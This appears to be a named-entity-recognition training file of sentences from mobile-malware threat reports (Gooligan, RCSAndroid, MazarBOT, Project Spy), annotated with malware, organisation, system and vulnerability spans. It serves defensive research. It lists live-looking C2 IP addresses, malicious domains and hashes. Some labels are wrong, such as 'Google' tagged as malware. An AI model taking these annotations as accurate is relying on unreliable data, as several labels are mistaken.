{"text": "Sophos detects all the samples of this Trojan family as Andr/Banker-GWC and Andr/Spybot-A .", "spans": {"ORGANIZATION: Sophos": [[0, 6]]}, "info": {"id": "cyner_train_000256", "source": "cyner_train"}}
{"text": "In the wild , these are only distributed as a direct download from unofficial Web pages ( “ third-party ” app ) and not through legitimate app stores .", "spans": {}, "info": {"id": "cyner_train_000257", "source": "cyner_train"}}
{"text": "Red Alert 2.0 IoCs list C2 addresses 103.239.30.126:7878 146.185.241.29:7878 146.185.241.42:7878 185.126.200.3:7878 185.126.200.12:7878 185.126.200.15:7878 185.126.200.18:7878 185.165.28.15:7878 185.243.243.241:7878 185.243.243.244:7878 185.243.243.245:7878 Domains Malware source Web hosts", "spans": {"MALWARE: Red Alert 2.0": [[0, 13]]}, "info": {"id": "cyner_train_000258", "source": "cyner_train"}}
{"text": "on 167.99.176.61 : free-androidvpn.date free-androidvpn.download free-androidvpn.online free-vpn.date free-vpn.download free-vpn.online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372", "spans": {}, "info": {"id": "cyner_train_000259", "source": "cyner_train"}}
{"text": "be92a751e5abbcd24151b509dbb4feb98ea46f367a99d6f86ed4a7c162461e31 5c4d666cef84abc2a1ffd3b1060ef28fa3c6c3bb4fad1fa26db99350b41bea4c 06081ab7faa729e33b9397a0e47548e75cbec3d43c50e6368e81d737552150a5 753999cb19a4346042f973e30cf1158c44f2335ab65859d3bfa16bca4098e2ef", "spans": {}, "info": {"id": "cyner_train_000260", "source": "cyner_train"}}
{"text": "As a result of a lot of hard work done by our security research teams , we revealed today a new and alarming malware campaign .", "spans": {}, "info": {"id": "cyner_train_000261", "source": "cyner_train"}}
{"text": "The number continues to rise at an additional 13,000 breached devices each day .", "spans": {}, "info": {"id": "cyner_train_000263", "source": "cyner_train"}}
{"text": "Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play , Gmail , Google Photos , Google Docs , G Suite , Google Drive , and more .", "spans": {"SYSTEM: Google Play": [[130, 141]], "SYSTEM: Gmail": [[144, 149]], "SYSTEM: Google Photos": [[152, 165]], "SYSTEM: Google Docs": [[168, 179]], "SYSTEM: G Suite": [[182, 189]], "SYSTEM: Google Drive": [[192, 204]]}, "info": {"id": "cyner_train_000264", "source": "cyner_train"}}
{"text": "Gooligan is a new variant of the Android malware campaign found by our researchers in the SnapPea app last year .", "spans": {"MALWARE: Gooligan": [[0, 8]], "MALWARE: SnapPea": [[90, 97]]}, "info": {"id": "cyner_train_000265", "source": "cyner_train"}}
{"text": "Check Point reached out to the Google Security team immediately with information on this campaign .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google Security": [[31, 46]]}, "info": {"id": "cyner_train_000266", "source": "cyner_train"}}
{"text": "Our researchers are working closely with Google to investigate the source of the Gooligan campaign .", "spans": {"ORGANIZATION: Google": [[41, 47]], "MALWARE: Gooligan campaign": [[81, 98]]}, "info": {"id": "cyner_train_000267", "source": "cyner_train"}}
{"text": "“ We ’ re appreciative of both Check Point ’ s research and their partnership as we ’ ve worked together to understand these issues , ” said Adrian Ludwig , Google ’ s director of Android security .", "spans": {"ORGANIZATION: Check Point": [[31, 42]], "ORGANIZATION: Google": [[157, 163]], "SYSTEM: Android": [[180, 187]]}, "info": {"id": "cyner_train_000268", "source": "cyner_train"}}
{"text": "We have chosen to join forces to continue the investigation around Gooligan .", "spans": {"MALWARE: Gooligan": [[67, 75]]}, "info": {"id": "cyner_train_000270", "source": "cyner_train"}}
{"text": "Google also stated that they are taking numerous steps including proactively notifying affected accounts , revoking affected tokens and deploying SafetyNet improvements to protect users from these apps in the future .", "spans": {"ORGANIZATION: Google": [[0, 6]]}, "info": {"id": "cyner_train_000271", "source": "cyner_train"}}
{"text": "Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop )": [[40, 92]]}, "info": {"id": "cyner_train_000273", "source": "cyner_train"}}
{"text": "In our research we identified tens of fake applications that were infected with this malware .", "spans": {}, "info": {"id": "cyner_train_000275", "source": "cyner_train"}}
{"text": "You may review your application list in “ Settings - > Apps ” , if you find one of this applications , please consider downloading an antivirus product such as Check Point ZoneAlarm to check if you are indeed infected .", "spans": {"ORGANIZATION: Check Point": [[160, 171]], "SYSTEM: ZoneAlarm": [[172, 181]]}, "info": {"id": "cyner_train_000277", "source": "cyner_train"}}
{"text": "How do you know if your Google account is breached ?", "spans": {"ORGANIZATION: Google": [[24, 30]]}, "info": {"id": "cyner_train_000279", "source": "cyner_train"}}
{"text": "You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ .", "spans": {}, "info": {"id": "cyner_train_000280", "source": "cyner_train"}}
{"text": "If your account has been breached , the following steps are required : A clean installation of an operating system on your mobile device is required ( a process called “ flashing ” ) .", "spans": {}, "info": {"id": "cyner_train_000281", "source": "cyner_train"}}
{"text": "As this is a complex process , we recommend powering off your device and approaching a certified technician , or your mobile service provider , to request that your device be “ re-flashed. ” Change your Google account passwords immediately after this process .", "spans": {"ORGANIZATION: Google": [[203, 209]]}, "info": {"id": "cyner_train_000282", "source": "cyner_train"}}
{"text": "How do Android devices become infected ?", "spans": {}, "info": {"id": "cyner_train_000283", "source": "cyner_train"}}
{"text": "We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores .", "spans": {"MALWARE: Gooligan": [[23, 31]], "SYSTEM: Android": [[97, 104]]}, "info": {"id": "cyner_train_000284", "source": "cyner_train"}}
{"text": "These stores are an attractive alternative to Google Play because many of their apps are free , or offer free versions of paid apps .", "spans": {"SYSTEM: Google Play": [[46, 57]]}, "info": {"id": "cyner_train_000285", "source": "cyner_train"}}
{"text": "However , the security of these stores and the apps they sell aren ’ t always verified .", "spans": {}, "info": {"id": "cyner_train_000286", "source": "cyner_train"}}
{"text": "How did Gooligan emerge ?", "spans": {"MALWARE: Gooligan": [[8, 16]]}, "info": {"id": "cyner_train_000288", "source": "cyner_train"}}
{"text": "Our researchers first encountered Gooligan ’ s code in the malicious SnapPea app last year .", "spans": {"MALWARE: Gooligan": [[34, 42]], "MALWARE: SnapPea": [[69, 76]]}, "info": {"id": "cyner_train_000289", "source": "cyner_train"}}
{"text": "At the time this malware was reported by several security vendors , and attributed to different malware families like Ghostpush , MonkeyTest , and Xinyinhe .", "spans": {"MALWARE: Ghostpush": [[118, 127]], "MALWARE: MonkeyTest": [[130, 140]], "MALWARE: Xinyinhe": [[147, 155]]}, "info": {"id": "cyner_train_000290", "source": "cyner_train"}}
{"text": "By late 2015 , the malware ’ s creators had gone mostly silent until the summer of 2016 when the malware reappeared with a more complex architecture that injects malicious code into Android system processes .", "spans": {"SYSTEM: Android": [[182, 189]]}, "info": {"id": "cyner_train_000291", "source": "cyner_train"}}
{"text": "The change in the way the malware works today may be to help finance the campaign through fraudulent ad activity .", "spans": {}, "info": {"id": "cyner_train_000292", "source": "cyner_train"}}
{"text": "The malware simulates clicks on app advertisements provided by legitimate ad networks and forces the app to install on a device .", "spans": {}, "info": {"id": "cyner_train_000293", "source": "cyner_train"}}
{"text": "An attacker is paid by the network when one of these apps is installed successfully .", "spans": {}, "info": {"id": "cyner_train_000294", "source": "cyner_train"}}
{"text": "Logs collected by Check Point researchers show that every day Gooligan installs at least 30,000 apps fraudulently on breached devices or over 2 million apps since the campaign began .", "spans": {"ORGANIZATION: Check Point": [[18, 29]], "MALWARE: Gooligan": [[62, 70]]}, "info": {"id": "cyner_train_000295", "source": "cyner_train"}}
{"text": "How does Gooligan work ?", "spans": {"MALWARE: Gooligan": [[9, 17]]}, "info": {"id": "cyner_train_000296", "source": "cyner_train"}}
{"text": "The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device .", "spans": {"MALWARE: Gooligan-infected": [[58, 75]]}, "info": {"id": "cyner_train_000297", "source": "cyner_train"}}
{"text": "Our research team has found infected apps on third-party app stores , but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages .", "spans": {"SYSTEM: Android": [[107, 114]]}, "info": {"id": "cyner_train_000298", "source": "cyner_train"}}
{"text": "After an infected app is installed , it sends data about the device to the campaign ’ s Command and Control ( C & C ) server .", "spans": {}, "info": {"id": "cyner_train_000299", "source": "cyner_train"}}
{"text": "Gooligan then downloads a rootkit from the C & C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT ( CVE-2013-6282 ) and Towelroot ( CVE-2014-3153 ) .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 and 5": [[89, 104]], "VULNERABILITY: VROOT": [[139, 144]], "VULNERABILITY: CVE-2013-6282": [[147, 160]], "VULNERABILITY: Towelroot": [[167, 176]], "VULNERABILITY: CVE-2014-3153": [[179, 192]]}, "info": {"id": "cyner_train_000300", "source": "cyner_train"}}
{"text": "If rooting is successful , the attacker has full control of the device and can execute privileged commands remotely .", "spans": {}, "info": {"id": "cyner_train_000302", "source": "cyner_train"}}
{"text": "This module injects code into running Google Play or GMS ( Google Mobile Services ) to mimic user behavior so Gooligan can avoid detection , a technique first seen with the mobile malware HummingBad .", "spans": {"SYSTEM: Google Play": [[38, 49]], "SYSTEM: GMS ( Google Mobile Services )": [[53, 83]], "MALWARE: Gooligan": [[110, 118]], "MALWARE: HummingBad": [[188, 198]]}, "info": {"id": "cyner_train_000304", "source": "cyner_train"}}
{"text": "This is another reminder of why users shouldn ’ t rely on ratings alone to decide whether to trust an app .", "spans": {}, "info": {"id": "cyner_train_000309", "source": "cyner_train"}}
{"text": "What are Google authorization tokens ?", "spans": {"ORGANIZATION: Google": [[9, 15]]}, "info": {"id": "cyner_train_000311", "source": "cyner_train"}}
{"text": "A Google authorization token is a way to access the Google account and the related services of a user .", "spans": {"ORGANIZATION: Google": [[2, 8], [52, 58]]}, "info": {"id": "cyner_train_000312", "source": "cyner_train"}}
{"text": "It is issued by Google once a user successfully logged into this account .", "spans": {"ORGANIZATION: Google": [[16, 22]]}, "info": {"id": "cyner_train_000313", "source": "cyner_train"}}
{"text": "When an authorization token is stolen by a hacker , they can use this token to access all the Google services related to the user , including Google Play , Gmail , Google Docs , Google Drive , and Google Photos .", "spans": {"ORGANIZATION: Google": [[94, 100]], "SYSTEM: Google Play": [[142, 153]], "SYSTEM: Gmail": [[156, 161]], "SYSTEM: Google Docs": [[164, 175]], "SYSTEM: Google Drive": [[178, 190]], "SYSTEM: Google Photos": [[197, 210]]}, "info": {"id": "cyner_train_000314", "source": "cyner_train"}}
{"text": "Conclusion Gooligan has breached over a million Google accounts .", "spans": {"MALWARE: Gooligan": [[11, 19]], "ORGANIZATION: Google": [[48, 54]]}, "info": {"id": "cyner_train_000316", "source": "cyner_train"}}
{"text": "We believe that it is the largest Google account breach to date , and we are working with Google to continue the investigation .", "spans": {"MALWARE: Google": [[34, 40]], "ORGANIZATION: Google": [[90, 96]]}, "info": {"id": "cyner_train_000317", "source": "cyner_train"}}
{"text": "We encourage Android users to validate whether their accounts have been breached .", "spans": {"SYSTEM: Android": [[13, 20]]}, "info": {"id": "cyner_train_000318", "source": "cyner_train"}}
{"text": "( Researchers have been aware of this suite as early as 2014 .", "spans": {}, "info": {"id": "cyner_train_000321", "source": "cyner_train"}}
{"text": ") The RCSAndroid code can be considered one of the most professionally developed and sophisticated Android malware ever exposed .", "spans": {"MALWARE: RCSAndroid": [[6, 16]], "SYSTEM: Android": [[99, 106]]}, "info": {"id": "cyner_train_000322", "source": "cyner_train"}}
{"text": "The leak of its code provides cybercriminals with a new weaponized resource for enhancing their surveillance operations .", "spans": {}, "info": {"id": "cyner_train_000323", "source": "cyner_train"}}
{"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the “ screencap ” command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode", "spans": {"MALWARE: RCSAndroid": [[31, 41]], "SYSTEM: Skype": [[288, 293]], "SYSTEM: Facebook": [[296, 304]], "SYSTEM: Twitter": [[307, 314]], "SYSTEM: Google": [[317, 323]], "SYSTEM: WhatsApp": [[326, 334]], "SYSTEM: Mail": [[337, 341]], "SYSTEM: LinkedIn": [[348, 356]], "SYSTEM: Gmail": [[409, 414]]}, "info": {"id": "cyner_train_000324", "source": "cyner_train"}}
{"text": "messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger .", "spans": {"SYSTEM: Facebook Messenger": [[38, 56]], "SYSTEM: WhatsApp": [[59, 67]], "SYSTEM: Skype": [[70, 75]], "SYSTEM: Viber": [[78, 83]], "SYSTEM: Line": [[86, 90]], "SYSTEM: WeChat": [[93, 99]], "SYSTEM: Hangouts": [[102, 110]], "SYSTEM: Telegram": [[113, 121]], "SYSTEM: BlackBerry Messenger": [[128, 148]]}, "info": {"id": "cyner_train_000325", "source": "cyner_train"}}
{"text": "Capture real-time voice calls in any network or app by hooking into the “ mediaserver ” system service RCSAndroid in the Wild Our analysis reveals that this RCSAndroid ( AndroidOS_RCSAgent.HRX ) has been in the wild since 2012 .", "spans": {"MALWARE: RCSAndroid": [[103, 113], [157, 167]]}, "info": {"id": "cyner_train_000326", "source": "cyner_train"}}
{"text": "Traces of its previous uses in the wild were found inside the configuration file : It was configured to use a Command-and-control ( C & C ) server in the United States ; however , the server was bought from a host service provider and is now unavailable .", "spans": {}, "info": {"id": "cyner_train_000327", "source": "cyner_train"}}
{"text": "Attackers can send SMS with certain messages to activate the agent and trigger corresponding action .", "spans": {}, "info": {"id": "cyner_train_000329", "source": "cyner_train"}}
{"text": "This can also define what kind of evidences to collect .", "spans": {}, "info": {"id": "cyner_train_000330", "source": "cyner_train"}}
{"text": "Based on emails leaked in the dump , a number of Czech firms appear to be in business with the Hacking team , including a major IT partner in the Olympic Games .", "spans": {}, "info": {"id": "cyner_train_000331", "source": "cyner_train"}}
{"text": "The first method is to send a specially crafted URL to the target via SMS or email .", "spans": {}, "info": {"id": "cyner_train_000334", "source": "cyner_train"}}
{"text": "The role of ANDROIDOS_HTBENEWS.A and the malicious APK mentioned in the first method is to exploit a local privilege escalation vulnerability in Android devices .", "spans": {"MALWARE: ANDROIDOS_HTBENEWS.A": [[12, 32]], "VULNERABILITY: local privilege escalation vulnerability": [[101, 141]]}, "info": {"id": "cyner_train_000337", "source": "cyner_train"}}
{"text": "The said exploits will root the device and install a shell backdoor .", "spans": {}, "info": {"id": "cyner_train_000339", "source": "cyner_train"}}
{"text": "This agent has two core modules , the Evidence Collector and the Event Action Trigger .", "spans": {}, "info": {"id": "cyner_train_000341", "source": "cyner_train"}}
{"text": "The Evidence Collector module is responsible for the spying routines outlined above .", "spans": {}, "info": {"id": "cyner_train_000342", "source": "cyner_train"}}
{"text": "One of its most notable routines is capturing voice calls in real time by hooking into the “ mediaserver ” system service .", "spans": {}, "info": {"id": "cyner_train_000343", "source": "cyner_train"}}
{"text": "The basic idea is to hook the voice call process in mediaserver .", "spans": {}, "info": {"id": "cyner_train_000344", "source": "cyner_train"}}
{"text": "Take voice call playback process for example .", "spans": {}, "info": {"id": "cyner_train_000345", "source": "cyner_train"}}
{"text": "The mediaserver will first builds a new unique track , start to play the track , loop play all audio buffer , then finally stop the playback .", "spans": {}, "info": {"id": "cyner_train_000346", "source": "cyner_train"}}
{"text": "With the help of the open-source Android Dynamic Binary Instrumentation Toolkit and root privilege , it is possible to intercept any function execution .", "spans": {"SYSTEM: Android": [[33, 40]]}, "info": {"id": "cyner_train_000348", "source": "cyner_train"}}
{"text": "Interestingly , one unused feature of the app is its ability to manipulate data in the Android package manager to add and remove permissions and components as well as hide the app icon .", "spans": {"SYSTEM: Android": [[87, 94]]}, "info": {"id": "cyner_train_000353", "source": "cyner_train"}}
{"text": "Recommendations Popular mobile platforms like Android are common targets for organized or commercialized monitoring operations .", "spans": {"SYSTEM: Android": [[46, 53]]}, "info": {"id": "cyner_train_000354", "source": "cyner_train"}}
{"text": "Attackers know that rooting devices via malware exploits is an effective means to control devices and gather information from them .", "spans": {}, "info": {"id": "cyner_train_000355", "source": "cyner_train"}}
{"text": "In a root broken device , security is a fairy tale .", "spans": {}, "info": {"id": "cyner_train_000356", "source": "cyner_train"}}
{"text": "Take note of the following best practices to prevent this threat from getting in your device : Disable app installations from unknown , third-party sources .", "spans": {}, "info": {"id": "cyner_train_000357", "source": "cyner_train"}}
{"text": "Constantly update your Android devices to the latest version to help prevent exploits , especially in the case of RCSAndroid which can affect only up to version 4.4.4 KitKat .", "spans": {"SYSTEM: Android": [[23, 30]], "MALWARE: RCSAndroid": [[114, 124]], "SYSTEM: 4.4.4 KitKat": [[161, 173]]}, "info": {"id": "cyner_train_000358", "source": "cyner_train"}}
{"text": "Note , however , that based on the leak mail from a customer inquiry , Hacking Team was in the process of developing exploits for Android 5.0 Lollipop .", "spans": {"ORGANIZATION: Hacking Team": [[71, 83]], "SYSTEM: Android 5.0 Lollipop": [[130, 150]]}, "info": {"id": "cyner_train_000359", "source": "cyner_train"}}
{"text": "Install a mobile security solution to secure your device from threats .", "spans": {}, "info": {"id": "cyner_train_000360", "source": "cyner_train"}}
{"text": "The leaked RCSAndroid code is a commercial weapon now in the wild .", "spans": {"MALWARE: RCSAndroid code": [[11, 26]]}, "info": {"id": "cyner_train_000361", "source": "cyner_train"}}
{"text": "Mobile users are called on to be on top of this news and be on guard for signs of monitoring .", "spans": {}, "info": {"id": "cyner_train_000362", "source": "cyner_train"}}
{"text": "Users may be required the help of their device manufacturer to get support for firmware flashing .", "spans": {}, "info": {"id": "cyner_train_000365", "source": "cyner_train"}}
{"text": "Find out more about the 7 Android Security Hacks You Need to Do Right Now to keep your mobile data safe .", "spans": {"SYSTEM: Android": [[26, 33]]}, "info": {"id": "cyner_train_000367", "source": "cyner_train"}}
{"text": "Update as of July 23 , 2015 1:00 AM PDT ( UTC-7 ) We have added a link to a previous report discussing this threat .", "spans": {}, "info": {"id": "cyner_train_000368", "source": "cyner_train"}}
{"text": "Timeline of posts related to the Hacking Team DATE UPDATE July 5 The Italian company Hacking Team was hacked , with more than 400GB of confidential company data made available to the public .", "spans": {"ORGANIZATION: Hacking Team": [[85, 97]]}, "info": {"id": "cyner_train_000369", "source": "cyner_train"}}
{"text": "One of these [ CVE-2015-5119 ] was a Flash zero-day .", "spans": {"VULNERABILITY: CVE-2015-5119": [[15, 28]]}, "info": {"id": "cyner_train_000371", "source": "cyner_train"}}
{"text": "The Windows kernel vulnerability ( CVE-2015-2387 ) existed in the open type font manager module ( ATMFD.dll ) and can be exploited to bypass the sandbox mitigation mechanism .", "spans": {"VULNERABILITY: Windows kernel vulnerability": [[4, 32]], "VULNERABILITY: CVE-2015-2387": [[35, 48]]}, "info": {"id": "cyner_train_000372", "source": "cyner_train"}}
{"text": "The Flash zero-day exploit ( CVE-2015-5119 ) was added into the Angler Exploit Kit and Nuclear Exploit Pack .", "spans": {"SYSTEM: Flash": [[4, 9]], "VULNERABILITY: CVE-2015-5119": [[29, 42]], "MALWARE: Angler Exploit Kit": [[64, 82]], "MALWARE: Nuclear Exploit Pack": [[87, 107]]}, "info": {"id": "cyner_train_000373", "source": "cyner_train"}}
{"text": "It was also used in limited attacks in Korea and Japan .", "spans": {}, "info": {"id": "cyner_train_000374", "source": "cyner_train"}}
{"text": "July 11 Two new Flash zero-day vulnerabilities , CVE-2015-5122 and CVE-2015-5123 , were found in the hacking team dump .", "spans": {"VULNERABILITY: Flash zero-day vulnerabilities": [[16, 46]], "VULNERABILITY: CVE-2015-5122": [[49, 62]], "VULNERABILITY: CVE-2015-5123": [[67, 80]]}, "info": {"id": "cyner_train_000375", "source": "cyner_train"}}
{"text": "July 13 Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System ( RCS ) agent installed in their targets ’ systems .", "spans": {"MALWARE: UEFI BIOS rootkit": [[81, 98]], "MALWARE: Remote Control System ( RCS )": [[113, 142]]}, "info": {"id": "cyner_train_000376", "source": "cyner_train"}}
{"text": "July 20 A new zero-day vulnerability ( CVE-2015-2426 ) was found in Windows , which Microsoft fixed in an out-of-band patch .", "spans": {"VULNERABILITY: zero-day vulnerability": [[14, 36]], "VULNERABILITY: CVE-2015-2426": [[39, 52]], "SYSTEM: Windows": [[68, 75]], "ORGANIZATION: Microsoft": [[84, 93]]}, "info": {"id": "cyner_train_000379", "source": "cyner_train"}}
{"text": "July 21 Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in .", "spans": {"MALWARE: RCSAndroid": [[24, 34]]}, "info": {"id": "cyner_train_000380", "source": "cyner_train"}}
{"text": "July 28 A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team .", "spans": {"SYSTEM: Flash": [[76, 81]], "ORGANIZATION: Hacking Team": [[102, 114]]}, "info": {"id": "cyner_train_000381", "source": "cyner_train"}}
{"text": "Android users warned of malware attack spreading via SMS FEB 16 , 2016 Security researchers are warning owners of Android smartphones about a new malware attack , spreading via SMS text messages .", "spans": {"SYSTEM: Android": [[0, 7], [114, 121]]}, "info": {"id": "cyner_train_000382", "source": "cyner_train"}}
{"text": "As the team at Scandinavian security group CSIS describes , malware known as MazarBOT is being distributed via SMS in Denmark and is likely to also be encountered in other countries .", "spans": {"ORGANIZATION: CSIS": [[43, 47]], "MALWARE: MazarBOT": [[77, 85]]}, "info": {"id": "cyner_train_000383", "source": "cyner_train"}}
{"text": "The txt message uses social engineering to dupe unsuspecting users into clicking on a link to a downloadable Android application .", "spans": {"SYSTEM: Android": [[109, 116]]}, "info": {"id": "cyner_train_000385", "source": "cyner_train"}}
{"text": "CSIS provided a ( sanitised ) version of a typical message to warn users what to look out for : “ You have received a multimedia message from + [ country code ] [ sender number ] Follow the link http : //www.mmsforyou [ .", "spans": {"ORGANIZATION: CSIS": [[0, 4]]}, "info": {"id": "cyner_train_000386", "source": "cyner_train"}}
{"text": "] net/mms.apk to view the message ” Once the APK package is downloaded , potential victims are urged to grant the malicious app a wide range of permissions on their Android device : App permissions SEND_SMS RECEIVE_BOOT_COMPLETED INTERNET SYSTEM_ALERT_WINDOW WRITE_SMS ACCESS_NETWORK_STATE WAKE_LOCK GET_TASKS CALL_PHONE RECEIVE_SMS READ_PHONE_STATE READ_SMS ERASE_PHONE Once installed , MazarBOT downloads a copy of", "spans": {"MALWARE: MazarBOT": [[388, 396]]}, "info": {"id": "cyner_train_000387", "source": "cyner_train"}}
{"text": "Tor onto users ’ Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim ’ s location to an Iranian mobile phone number .", "spans": {"SYSTEM: Tor": [[0, 3]], "SYSTEM: Android": [[17, 24]]}, "info": {"id": "cyner_train_000388", "source": "cyner_train"}}
{"text": "With the malware now in place , a number of actions can be performed , including allowing attackers to secretly monitor and control smartphones via a backdoor , send messages to premium-rate numbers , and intercept two-factor authentication codes sent by online banking apps and the like .", "spans": {}, "info": {"id": "cyner_train_000389", "source": "cyner_train"}}
{"text": "In fact , with full access to the compromised Android smartphone , the opportunities for criminals to wreak havoc are significant – such as erasing infected phones or launching man-in-the-middle ( MITM ) attacks .", "spans": {"SYSTEM: Android smartphone": [[46, 64]]}, "info": {"id": "cyner_train_000390", "source": "cyner_train"}}
{"text": "This , in itself , does not prove that the perpetrators of the malware campaign are based in Russia , but it certainly sounds as if that is a strong possibility .", "spans": {}, "info": {"id": "cyner_train_000392", "source": "cyner_train"}}
{"text": "Malware authors in the past have often coded a “ safety net ” into their malware to prevent them from accidentally infecting their own computers and devices .", "spans": {}, "info": {"id": "cyner_train_000393", "source": "cyner_train"}}
{"text": "And , of course , remember to always be wary of unsolicited , unusual text messages and installing apps from third-party sources on your Android smartphone .", "spans": {"SYSTEM: Android smartphone": [[137, 155]]}, "info": {"id": "cyner_train_000395", "source": "cyner_train"}}
{"text": "Coronavirus Update App Leads to Project Spy Android and iOS Spyware We discovered a cyberespionage campaign we have named Project Spy infecting Android and iOS devices with spyware by using the coronavirus disease ( Covid-19 ) as a lure .", "spans": {"SYSTEM: Coronavirus Update App": [[0, 22]], "MALWARE: Project Spy": [[32, 43], [122, 133]], "SYSTEM: Android": [[44, 51], [144, 151]], "SYSTEM: iOS": [[56, 59], [156, 159]]}, "info": {"id": "cyner_train_000396", "source": "cyner_train"}}
{"text": "Project Spy uses the ongoing coronavirus pandemic as a lure , posing as an app called Coronavirus Updates .", "spans": {"MALWARE: Project Spy": [[0, 11]]}, "info": {"id": "cyner_train_000398", "source": "cyner_train"}}
{"text": "However , we have noted a significantly small number of downloads of the app in Pakistan , India , Afghanistan , Bangladesh , Iran , Saudi Arabia , Austria , Romania , Grenada , and Russia .", "spans": {}, "info": {"id": "cyner_train_000400", "source": "cyner_train"}}
{"text": "Project Spy routine At the end of March 2020 , we came across an app masquerading as a coronavirus update app , which we named Project Spy based on the login page of its backend server .", "spans": {"MALWARE: Project Spy": [[0, 11], [127, 138]]}, "info": {"id": "cyner_train_000401", "source": "cyner_train"}}
{"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. , IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g.", "spans": {"SYSTEM: GSM": [[55, 58]], "SYSTEM: WhatsApp": [[61, 69]], "SYSTEM: Telegram": [[72, 80]], "SYSTEM: Facebook": [[83, 91]], "SYSTEM: Threema": [[98, 105]], "SYSTEM: Android": [[330, 337]]}, "info": {"id": "cyner_train_000402", "source": "cyner_train"}}
{"text": ", IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database .", "spans": {}, "info": {"id": "cyner_train_000403", "source": "cyner_train"}}
{"text": "Project Spy ’ s earlier versions Searching for the domain in our sample database , we found that the coronavirus update app appears to be the latest version of another sample that we detected in May 2019 .", "spans": {"MALWARE: Project Spy": [[0, 11]]}, "info": {"id": "cyner_train_000405", "source": "cyner_train"}}
{"text": "The first version of Project Spy ( detected by Trend Micro as AndroidOS_SpyAgent.HRXB ) had the following capabilities : Collect device and system information ( i.e. , IMEI , device ID , manufacturer , model and phone number ) , location information , contacts stored , and call logs Collect and send SMS Take pictures via the camera Upload recorded MP4 files Monitor calls Searching further , we also found another sample that could be the second version of Project Spy .", "spans": {"MALWARE: Project Spy": [[21, 32]], "ORGANIZATION: Trend Micro": [[47, 58]]}, "info": {"id": "cyner_train_000406", "source": "cyner_train"}}
{"text": "In this second version , the developer ’ s name listed was “ concipit1248 ” in Google Play , and may have been active between May 2019 to February 2020 .", "spans": {"SYSTEM: Google Play": [[79, 90]]}, "info": {"id": "cyner_train_000408", "source": "cyner_train"}}
{"text": "This app appears to have become unavailable on Google Play in March 2020 .", "spans": {"SYSTEM: Google Play": [[47, 58]]}, "info": {"id": "cyner_train_000409", "source": "cyner_train"}}
{"text": "The second Project Spy version has similar capabilities to the first version , with the addition of the following : Stealing notification messages sent from WhatsApp , Facebook , and Telegram Abandoning the FTP mode of uploading the recorded images Aside from changing the app ’ s supposed function and look , the second and third versions ’ codes had little differences .", "spans": {"MALWARE: Project Spy": [[11, 22]], "SYSTEM: WhatsApp": [[157, 165]], "SYSTEM: Facebook": [[168, 176]], "SYSTEM: Telegram": [[183, 191]]}, "info": {"id": "cyner_train_000410", "source": "cyner_train"}}
{"text": "Potentially malicious iOS connection Using the codes and “ Concipit1248 ” to check for more versions , we found two other apps in the App Store .", "spans": {"SYSTEM: iOS": [[22, 25]], "SYSTEM: App Store": [[134, 143]]}, "info": {"id": "cyner_train_000411", "source": "cyner_train"}}
{"text": "] ee , is the same one used in the Android version of Project Spy .", "spans": {"SYSTEM: Android": [[35, 42]], "SYSTEM: Project Spy": [[54, 65]]}, "info": {"id": "cyner_train_000414", "source": "cyner_train"}}
{"text": "However , although the “ Concipit1248 ” app requested permissions to open the device camera and read photos , the code only can upload a self-contained PNG file to a remote sever .", "spans": {}, "info": {"id": "cyner_train_000415", "source": "cyner_train"}}
{"text": "This may imply the “ Concipit1248 ” app is still incubating .", "spans": {}, "info": {"id": "cyner_train_000416", "source": "cyner_train"}}
{"text": "It also appears the apps may still be in development or incubation , maybe waiting for a “ right time ” to inject the malicious codes .", "spans": {}, "info": {"id": "cyner_train_000421", "source": "cyner_train"}}
{"text": "It ’ s also possible that the apps are being used to test other possible techniques .", "spans": {}, "info": {"id": "cyner_train_000422", "source": "cyner_train"}}
{"text": "A possible indication for timing might be when the app reaches a specific number of downloads or infected devices .", "spans": {}, "info": {"id": "cyner_train_000423", "source": "cyner_train"}}
{"text": "The coding style suggests that the cybercriminals behind this campaign are amateurs .", "spans": {}, "info": {"id": "cyner_train_000424", "source": "cyner_train"}}
{"text": "The incomplete iOS codes used in this campaign may have been bought while other capabilities appear to have been added .", "spans": {"SYSTEM: iOS": [[15, 18]]}, "info": {"id": "cyner_train_000425", "source": "cyner_train"}}
